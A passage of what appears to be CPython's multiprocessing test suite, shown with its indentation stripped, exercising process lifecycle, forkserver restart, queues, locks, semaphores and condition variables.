# (join() and is_alive(), the support function can be reused
support.join_thread(process)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
